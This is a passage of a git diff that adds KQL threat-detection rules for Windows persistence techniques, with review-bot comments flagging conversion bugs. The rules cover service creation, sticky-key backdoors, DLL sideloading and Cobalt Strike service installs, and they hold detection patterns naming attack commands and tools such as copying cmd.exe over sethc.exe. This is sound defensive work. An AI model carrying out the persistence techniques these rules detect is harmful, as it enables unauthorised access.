@@ -0,0 +1,12 @@ +// Title: New ODBC Driver Registered +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-23 +// Level: low +// Description: Detects the registration of a new ODBC driver. +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Likely + +DeviceRegistryEvents +| where (RegistryKey endswith "\\SOFTWARE\\ODBC\\ODBCINST.INI*" and RegistryKey endswith "\\Driver") and (not((RegistryValueData =~ "%WINDIR%\\System32\\SQLSRV32.dll" and RegistryKey endswith "\\SQL Server*"))) and (not(((RegistryValueData endswith "\\ACEODBC.DLL" and RegistryValueData startswith "C:\\Progra" and RegistryKey contains "\\Microsoft Access ") or (RegistryValueData endswith "\\ACEODBC.DLL" and RegistryValueData startswith "C:\\Progra" and RegistryKey contains "\\Microsoft Excel Driver")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/new_service_creation_using_powershell.kql b/KQL/rules/Persistence/new_service_creation_using_powershell.kql new file mode 100644 index 00000000..9ff9349e --- /dev/null +++ b/KQL/rules/Persistence/new_service_creation_using_powershell.kql @@ -0,0 +1,13 @@ +// Title: New Service Creation Using PowerShell +// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community +// Date: 2023-02-20 +// Level: low +// Description: Detects the creation of a new service using powershell. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003 +// False Positives: +// - Legitimate administrator or user creates a service for legitimate reasons. +// - Software installation + +DeviceProcessEvents +| where ProcessCommandLine contains "New-Service" and ProcessCommandLine contains "-BinaryPathName" \ No newline at end of file diff --git a/KQL/rules/Persistence/new_service_creation_using_sc_exe.kql b/KQL/rules/Persistence/new_service_creation_using_sc_exe.kql new file mode 100644 index 00000000..b052820a --- /dev/null 
+++ b/KQL/rules/Persistence/new_service_creation_using_sc_exe.kql @@ -0,0 +1,13 @@ +// Title: New Service Creation Using Sc.EXE +// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community +// Date: 2023-02-20 +// Level: low +// Description: Detects the creation of a new service using the "sc.exe" utility. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003 +// False Positives: +// - Legitimate administrator or user creates a service for legitimate reasons. +// - Software installation + +DeviceProcessEvents +| where ((ProcessCommandLine contains "create" and ProcessCommandLine contains "binPath") and FolderPath endswith "\\sc.exe") and (not((InitiatingProcessFolderPath endswith "\\Dropbox.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Dropbox\\Client\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Dropbox\\Client\\")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/new_timeproviders_registered_with_uncommon_dll_name.kql b/KQL/rules/Persistence/new_timeproviders_registered_with_uncommon_dll_name.kql new file mode 100644 index 00000000..7b2543b6 --- /dev/null +++ b/KQL/rules/Persistence/new_timeproviders_registered_with_uncommon_dll_name.kql 
@@ -0,0 +1,13 @@ +// Title: New TimeProviders Registered With Uncommon DLL Name +// Author: frack113 +// Date: 2022-06-19 +// Level: high +// Description: Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. +Adversaries may abuse time providers to execute DLLs when the system boots. +The Windows Time service (W32Time) enables time synchronization across and within domains. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1547.003 + +DeviceRegistryEvents +| where (RegistryKey contains "\\Services\\W32Time\\TimeProviders" and RegistryKey endswith "\\DllName") and (not((RegistryValueData in~ ("%SystemRoot%\\System32\\vmictimeprovider.dll", "%systemroot%\\system32\\w32time.dll", "C:\\Windows\\SYSTEM32\\w32time.DLL")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/new_user_created_via_net_exe.kql b/KQL/rules/Persistence/new_user_created_via_net_exe.kql new file mode 100644 index 00000000..1f789bc2 --- /dev/null +++ b/KQL/rules/Persistence/new_user_created_via_net_exe.kql @@ -0,0 +1,13 @@ +// Title: New User Created Via Net.EXE +// Author: Endgame, JHasenbusch (adapted to Sigma for oscd.community) +// Date: 2018-10-30 +// Level: medium +// Description: Identifies the creation of local users via the net.exe command. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1136.001 +// False Positives: +// - Legitimate user creation. +// - Better use event IDs for user creation rather than command line rules. + +DeviceProcessEvents +| where (ProcessCommandLine contains "user" and ProcessCommandLine contains "add") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file 
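Review bot: The second and third description lines (`+Adversaries may abuse time providers...` and `+The Windows Time service (W32Time)...`) are emitted without the `//` prefix, so the file is not valid KQL: those words will be parsed as query text ahead of `DeviceRegistryEvents`. The converter should prefix every line of a multi-line Sigma description, e.g. `// Adversaries may abuse time providers to execute DLLs when the system boots.`, and the same breakage is present in the Disk Cleanup Handler, Sticky Key Backdoor, Azure Browser SSO and ErrorHandler.Cmd hunks.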
diff --git a/KQL/rules/Persistence/new_user_created_via_net_exe_with_never_expire_option.kql b/KQL/rules/Persistence/new_user_created_via_net_exe_with_never_expire_option.kql
new file mode 100644
index 00000000..65940bab
--- /dev/null
+++ b/KQL/rules/Persistence/new_user_created_via_net_exe_with_never_expire_option.kql
@@ -0,0 +1,12 @@
+// Title: New User Created Via Net.EXE With Never Expire Option
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-12
+// Level: high
+// Description: Detects creation of local users via the net.exe command with the option "never expire"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1136.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "user" and ProcessCommandLine contains "add" and ProcessCommandLine contains "expires:never") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/non_privileged_usage_of_reg_or_powershell.kql b/KQL/rules/Persistence/non_privileged_usage_of_reg_or_powershell.kql
new file mode 100644
index 00000000..c75228b3
--- /dev/null
+++ b/KQL/rules/Persistence/non_privileged_usage_of_reg_or_powershell.kql
@@ -0,0 +1,10 @@ +// Title: Non-privileged Usage of Reg or Powershell +// Author: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community +// Date: 2020-10-05 +// Level: high +// Description: Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "reg " and ProcessCommandLine contains "add") or (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "set-itemproperty" or ProcessCommandLine contains " sp " or ProcessCommandLine contains "new-itemproperty")) and ((ProcessCommandLine contains "ImagePath" or ProcessCommandLine contains "FailureCommand" or ProcessCommandLine contains "ServiceDLL") and (ProcessCommandLine contains "ControlSet" and ProcessCommandLine contains "Services") and (ProcessIntegrityLevel in~ ("Medium", "S-1-16-8192"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/office_application_startup_office_test.kql b/KQL/rules/Persistence/office_application_startup_office_test.kql new file mode 100644 index 00000000..0afb47c7 --- /dev/null +++ b/KQL/rules/Persistence/office_application_startup_office_test.kql @@ -0,0 +1,12 @@ +// Title: Office Application Startup - Office Test +// Author: omkar72 +// Date: 2020-10-25 +// Level: medium +// Description: Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1137.002 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where RegistryKey contains "\\Software\\Microsoft\\Office test\\Special\\Perf" \ No newline at end of file 
diff --git a/KQL/rules/Persistence/office_macros_warning_disabled.kql b/KQL/rules/Persistence/office_macros_warning_disabled.kql new file mode 100644 index 00000000..73dc8242 --- /dev/null +++ b/KQL/rules/Persistence/office_macros_warning_disabled.kql @@ -0,0 +1,12 @@ +// Title: Office Macros Warning Disabled +// Author: Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-05-22 +// Level: high +// Description: Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Security\\VBAWarnings" \ No newline at end of file diff --git a/KQL/rules/Persistence/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql b/KQL/rules/Persistence/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql new file mode 100644 index 00000000..474820dd --- /dev/null +++ b/KQL/rules/Persistence/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql @@ -0,0 +1,10 @@ +// Title: Outlook EnableUnsafeClientMailRules Setting Enabled - Registry +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-08 +// Level: high +// Description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Outlook\\Security\\EnableUnsafeClientMailRules" \ No newline at end of file 
diff --git a/KQL/rules/Persistence/outlook_security_settings_updated_registry.kql b/KQL/rules/Persistence/outlook_security_settings_updated_registry.kql new file mode 100644 index 00000000..2c548b80 --- /dev/null +++ b/KQL/rules/Persistence/outlook_security_settings_updated_registry.kql @@ -0,0 +1,12 @@ +// Title: Outlook Security Settings Updated - Registry +// Author: frack113 +// Date: 2021-12-28 +// Level: medium +// Description: Detects changes to the registry values related to outlook security settings +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1137 +// False Positives: +// - Administrative activity + +DeviceRegistryEvents +| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Office*" and RegistryKey endswith "\\Outlook\\Security*" \ No newline at end of file diff --git a/KQL/rules/Persistence/path_to_screensaver_binary_modified.kql b/KQL/rules/Persistence/path_to_screensaver_binary_modified.kql new file mode 100644 index 00000000..68500c23 --- /dev/null +++ b/KQL/rules/Persistence/path_to_screensaver_binary_modified.kql @@ -0,0 +1,12 @@ +// Title: Path To Screensaver Binary Modified +// Author: Bartlomiej Czyz @bczyz1, oscd.community +// Date: 2020-10-11 +// Level: medium +// Description: Detects value modification of registry key containing path to binary used as screensaver. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.002 +// False Positives: +// - Legitimate modification of screensaver + +DeviceRegistryEvents +| where RegistryKey endswith "\\Control Panel\\Desktop\\SCRNSAVE.EXE" and (not((InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/persistence_via_disk_cleanup_handler_autorun.kql b/KQL/rules/Persistence/persistence_via_disk_cleanup_handler_autorun.kql new file mode 100644 index 00000000..54c2e904 --- /dev/null 
+++ b/KQL/rules/Persistence/persistence_via_disk_cleanup_handler_autorun.kql @@ -0,0 +1,16 @@ +// Title: Persistence Via Disk Cleanup Handler - Autorun +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-21 +// Level: medium +// Description: Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun. +The disk cleanup manager is part of the operating system. +It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. +Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. +Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. +Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler. + +// MITRE Tactic: Persistence +// Tags: attack.persistence + +DeviceRegistryEvents +| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VolumeCaches*" and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Autorun") or ((RegistryValueData contains "cmd" or RegistryValueData contains "powershell" or RegistryValueData contains "rundll32" or RegistryValueData contains "mshta" or RegistryValueData contains "cscript" or RegistryValueData contains "wscript" or RegistryValueData contains "wsl" or RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Windows\\TEMP\\" or RegistryValueData contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") and (RegistryKey contains "\\CleanupString" or RegistryKey contains "\\PreCleanupString"))) \ No newline at end of file 
diff --git a/KQL/rules/Persistence/persistence_via_hhctrl_ocx.kql b/KQL/rules/Persistence/persistence_via_hhctrl_ocx.kql
new file mode 100644
index 00000000..f18dc1a9
--- /dev/null
+++ b/KQL/rules/Persistence/persistence_via_hhctrl_ocx.kql
@@ -0,0 +1,12 @@
+// Title: Persistence Via Hhctrl.ocx
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects when an attacker modifies the registry value of the "hhctrl" to point to a custom binary
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\CLSID\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\InprocServer32\\(Default)" and (not(RegistryValueData =~ "C:\\Windows\\System32\\hhctrl.ocx"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/persistence_via_new_sip_provider.kql b/KQL/rules/Persistence/persistence_via_new_sip_provider.kql
new file mode 100644
index 00000000..84398537
--- /dev/null
+++ b/KQL/rules/Persistence/persistence_via_new_sip_provider.kql
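Review bot: `RegistryKey contains "...\\InprocServer32\\(Default)"` carries Sysmon's `(Default)` pseudo value name into the key path; DeviceRegistryEvents keeps the value name in the separate `RegistryValueName` column and, as far as I can tell, records the default value with an empty name, so this condition is unlikely to ever match. A closer translation is `RegistryKey contains "\\CLSID\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\InprocServer32" and isempty(RegistryValueName)`, keeping the existing `not(RegistryValueData =~ ...)` exclusion; confirm the default-value representation against live data.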
@@ -0,0 +1,12 @@ +// Title: Persistence Via New SIP Provider +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-21 +// Level: medium +// Description: Detects when an attacker register a new SIP provider for persistence and defense evasion +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1553.003 +// False Positives: +// - Legitimate SIP being registered by the OS or different software. + +DeviceRegistryEvents +| where ((RegistryKey contains "\\Dll" or RegistryKey contains "\\$DLL") and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Cryptography\\Providers*" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType" or RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers*" or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType")) and (not(((RegistryValueData in~ ("WINTRUST.DLL", "mso.dll")) or (RegistryValueData =~ "C:\\Windows\\System32\\PsfSip.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" and RegistryKey contains "\\CryptSIPDll")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/persistence_via_sticky_key_backdoor.kql b/KQL/rules/Persistence/persistence_via_sticky_key_backdoor.kql new file mode 100644 index 00000000..7b53e8cb --- /dev/null +++ b/KQL/rules/Persistence/persistence_via_sticky_key_backdoor.kql 
@@ -0,0 +1,14 @@ +// Title: Persistence Via Sticky Key Backdoor +// Author: Sreeman +// Date: 2020-02-18 +// Level: critical +// Description: By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system. +When the sticky keys are "activated" the privilleged shell is launched. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1546.008, attack.privilege-escalation +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "copy " and ProcessCommandLine contains "/y " and ProcessCommandLine contains "C:\\windows\\system32\\cmd.exe C:\\windows\\system32\\sethc.exe" \ No newline at end of file diff --git a/KQL/rules/Persistence/persistence_via_typedpaths_commandline.kql b/KQL/rules/Persistence/persistence_via_typedpaths_commandline.kql new file mode 100644 index 00000000..84f7d7e0 --- /dev/null +++ b/KQL/rules/Persistence/persistence_via_typedpaths_commandline.kql @@ -0,0 +1,10 @@ +// Title: Persistence Via TypedPaths - CommandLine +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-22 +// Level: medium +// Description: Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt +// MITRE Tactic: Persistence +// Tags: attack.persistence + +DeviceProcessEvents +| where ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths" \ No newline at end of file diff --git a/KQL/rules/Persistence/possible_privilege_escalation_via_weak_service_permissions.kql b/KQL/rules/Persistence/possible_privilege_escalation_via_weak_service_permissions.kql new file mode 100644 index 00000000..8b970fc6 --- /dev/null +++ b/KQL/rules/Persistence/possible_privilege_escalation_via_weak_service_permissions.kql 
@@ -0,0 +1,10 @@ +// Title: Possible Privilege Escalation via Weak Service Permissions +// Author: Teymur Kheirkhabarov +// Date: 2019-10-26 +// Level: high +// Description: Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011 + +DeviceProcessEvents +| where (FolderPath endswith "\\sc.exe" and (ProcessIntegrityLevel in~ ("Medium", "S-1-16-8192"))) and ((ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") or (ProcessCommandLine contains "failure" and ProcessCommandLine contains "command")) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_appverifui_dll_sideloading.kql b/KQL/rules/Persistence/potential_appverifui_dll_sideloading.kql new file mode 100644 index 00000000..0775aeb7 --- /dev/null +++ b/KQL/rules/Persistence/potential_appverifui_dll_sideloading.kql @@ -0,0 +1,12 @@ +// Title: Potential appverifUI.DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-06-20 +// Level: high +// Description: Detects potential DLL sideloading of "appverifUI.dll" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents +| where FolderPath endswith "\\appverifUI.dll" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\appverif.exe", "C:\\Windows\\System32\\appverif.exe")) and (FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_avkkid_dll_sideloading.kql b/KQL/rules/Persistence/potential_avkkid_dll_sideloading.kql new file mode 100644 index 00000000..67190992 --- /dev/null 
+++ b/KQL/rules/Persistence/potential_avkkid_dll_sideloading.kql @@ -0,0 +1,10 @@ +// Title: Potential AVKkid.DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-08-03 +// Level: medium +// Description: Detects potential DLL sideloading of "AVKkid.dll" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents +| where FolderPath endswith "\\AVKkid.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\G DATA\\" or FolderPath startswith "C:\\Program Files\\G DATA\\") and (InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\G DATA\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\G DATA\\") and InitiatingProcessFolderPath endswith "\\AVKKid.exe"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_azure_browser_sso_abuse.kql b/KQL/rules/Persistence/potential_azure_browser_sso_abuse.kql new file mode 100644 index 00000000..336bfe26 --- /dev/null +++ b/KQL/rules/Persistence/potential_azure_browser_sso_abuse.kql 
@@ -0,0 +1,14 @@ +// Title: Potential Azure Browser SSO Abuse +// Author: Den Iuzvyk +// Date: 2020-07-15 +// Level: low +// Description: Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser. +An attacker can use this to authenticate to Azure AD in a browser as that user. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - False positives are expected since this rules is only looking for the DLL load event. This rule is better used in correlation with related activity + +DeviceImageLoadEvents +| where FolderPath =~ "C:\\Windows\\System32\\MicrosoftAccountTokenProvider.dll" and (not((InitiatingProcessFolderPath endswith "\\BackgroundTaskHost.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) and (not(((InitiatingProcessFolderPath endswith "\\IDE\\devenv.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program 
Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_binary_or_script_dropper_via_powershell.kql b/KQL/rules/Persistence/potential_binary_or_script_dropper_via_powershell.kql
new file mode 100644
index 00000000..91e07edd
--- /dev/null
+++ b/KQL/rules/Persistence/potential_binary_or_script_dropper_via_powershell.kql
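Review bot: `isnull(InitiatingProcessFolderPath)` in the final exclusion group is unlikely to have any effect, because advanced hunting tables generally represent an absent string column as an empty string rather than null, so loads with no recorded initiating process will still alert. `isempty(InitiatingProcessFolderPath)` covers both cases and is the usual form for this table. The enclosing `where` starts on the previous physical line; the rest of the exclusion list reads correctly.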
@@ -0,0 +1,12 @@ +// Title: Potential Binary Or Script Dropper Via PowerShell +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-17 +// Level: medium +// Description: Detects PowerShell creating a binary executable or a script file. +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - False positives will differ depending on the environment and scripts used. Apply additional filters accordingly. + +DeviceFileEvents +| where ((InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".chm" or FolderPath endswith ".cmd" or FolderPath endswith ".com" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".jar" or FolderPath endswith ".js" or FolderPath endswith ".ocx" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf")) and (not(((FolderPath endswith "\\Microsoft.PackageManagement.NuGetProvider.dll" and FolderPath startswith "C:\\Program Files\\PackageManagement\\ProviderAssemblies\\nuget\\") or ((FolderPath endswith ".dll" or FolderPath endswith ".exe") and (FolderPath startswith "C:\\Windows\\Temp\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\")) or (FolderPath contains "\\WindowsPowerShell\\Modules\\" and FolderPath endswith ".dll" and FolderPath startswith "C:\\Users\\") or (FolderPath contains "\\AppData\\Local\\Temp\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe") and FolderPath startswith "C:\\Users\\")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_cobaltstrike_service_installations_registry.kql b/KQL/rules/Persistence/potential_cobaltstrike_service_installations_registry.kql new file mode 100644 index 00000000..63ed0524 
--- /dev/null
+++ b/KQL/rules/Persistence/potential_cobaltstrike_service_installations_registry.kql
@@ -0,0 +1,13 @@
+// Title: Potential CobaltStrike Service Installations - Registry
+// Author: Wojciech Lesicki
+// Date: 2021-06-29
+// Level: high
+// Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.lateral-movement, attack.t1021.002, attack.t1543.003, attack.t1569.002
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where ((RegistryValueData contains "ADMIN$" and RegistryValueData contains ".exe") or (RegistryValueData contains "%COMSPEC%" and RegistryValueData contains "start" and RegistryValueData contains "powershell")) and (RegistryKey contains "\\System\\CurrentControlSet\\Services" or (RegistryKey contains "\\System\\ControlSet" and RegistryKey contains "\\Services"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_eacore_dll_sideloading.kql b/KQL/rules/Persistence/potential_eacore_dll_sideloading.kql
new file mode 100644
index 00000000..48b94c8c
--- /dev/null
+++ b/KQL/rules/Persistence/potential_eacore_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential EACore.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-08-03
+// Level: high
+// Description: Detects potential DLL sideloading of "EACore.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\EACore.dll" and (not((FolderPath startswith "C:\\Program Files\\Electronic Arts\\EA Desktop\\" and (InitiatingProcessFolderPath contains "C:\\Program Files\\Electronic Arts\\EA Desktop\\" and InitiatingProcessFolderPath contains "\\EACoreServer.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_edputil_dll_sideloading.kql b/KQL/rules/Persistence/potential_edputil_dll_sideloading.kql
new file mode 100644
index 00000000..13ffbca1
--- /dev/null
+++ b/KQL/rules/Persistence/potential_edputil_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential Edputil.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-09
+// Level: high
+// Description: Detects potential DLL sideloading of "edputil.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\edputil.dll" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_goopdate_dll_sideloading.kql b/KQL/rules/Persistence/potential_goopdate_dll_sideloading.kql
new file mode 100644
index 00000000..bc09ff85
--- /dev/null
+++ b/KQL/rules/Persistence/potential_goopdate_dll_sideloading.kql
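Review bot: In the Edputil.DLL hunk the third exclusion path `"C\\Windows\\WinSxS\\"` is missing the colon after the drive letter, so edputil.dll loaded from the WinSxS store is never filtered and every such load will be raised as a sideloading hit. Change it to `FolderPath startswith "C:\\Windows\\WinSxS\\"`. This looks like a typo inherited from the source rule rather than a converter problem, so it is worth fixing upstream as well.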
@@ -0,0 +1,13 @@ +// Title: Potential Goopdate.DLL Sideloading +// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-15 +// Level: medium +// Description: Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - False positives are expected from Google Chrome installations running from user locations (AppData) and other custom locations. Apply additional filters accordingly. +// - Other third party chromium browsers located in AppData + +DeviceImageLoadEvents +| where FolderPath endswith "\\goopdate.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\"))) and (not((((FolderPath contains "\\AppData\\Local\\Temp\\GUM" and FolderPath contains ".tmp\\goopdate.dll") and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\GUM" and InitiatingProcessFolderPath contains ".tmp\\Dropbox")) or ((FolderPath contains "\\AppData\\Local\\Temp\\GUM" or FolderPath contains ":\\Windows\\SystemTemp\\GUM") and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\GUM" or InitiatingProcessFolderPath contains ":\\Windows\\SystemTemp\\GUM") and InitiatingProcessFolderPath endswith ".tmp\\GoogleUpdate.exe")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_iviewers_dll_sideloading.kql b/KQL/rules/Persistence/potential_iviewers_dll_sideloading.kql new file mode 100644 index 00000000..73a2d0c8 --- /dev/null +++ 